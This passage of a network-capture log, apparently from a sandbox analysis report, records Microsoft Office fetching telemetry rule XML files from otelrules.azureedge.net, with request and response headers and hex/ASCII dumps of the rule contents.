                                                                                                                                                                                                x-azure-ref: 20241120T095429Z-r1d97b99577n5jhbhC1TEB74vn00000008qg000000004r0s
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                81192.168.2.74978313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:29 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 405
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                x-ms-request-id: d7880247-601e-0070-328c-3aa0c9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095429Z-r1d97b9957747b9jhC1TEBgyec00000008u0000000006pew
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:29 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                82192.168.2.74978513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:29 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 174
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095429Z-185f5d8b95c5lcmhhC1NYCsnsw0000000a1g00000000fdp0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:29 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                83192.168.2.74978913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:30 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2592
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095430Z-1777c6cb754dqb2khC1TEBmk1s00000009b000000000b8f9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:30 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                84192.168.2.74978813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:30 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 501
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                x-ms-request-id: 733c6689-901e-007b-288c-3aac50000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095430Z-185f5d8b95crl6swhC1NYC3ueg0000000a8g000000003x1k
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:30 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                85192.168.2.74978713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:30 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 958
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                x-ms-request-id: f9e87e47-a01e-0098-3d13-3b8556000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095430Z-1777c6cb7544n7p6hC1TEByvb400000009fg00000000da0w
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:30 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                86192.168.2.74978613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:30 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1952
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                x-ms-request-id: 8e68b69a-701e-005c-5c8c-3abb94000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095430Z-1777c6cb7544nvmshC1TEBf7qc0000000980000000007qay
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:30 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                87192.168.2.74979013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:30 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:30 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:30 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 3342
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                x-ms-request-id: ff95cf15-b01e-0001-328c-3a46e2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095430Z-r1d97b99577d6qrbhC1TEBux5s00000008tg0000000086fd
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:30 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                88192.168.2.74979113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:31 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                x-ms-request-id: 6d4f85c2-e01e-0003-2b8c-3a0fa8000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095431Z-r1d97b9957747b9jhC1TEBgyec00000008qg00000000cxzr
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:31 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                89192.168.2.74979213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:31 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2284
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095431Z-185f5d8b95c95vpshC1NYC759c0000000a1000000000aw6a
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:31 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                90192.168.2.74979313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:31 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:31 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:31 GMT
                                                                                                                                                                                                Content-Type: text/xml
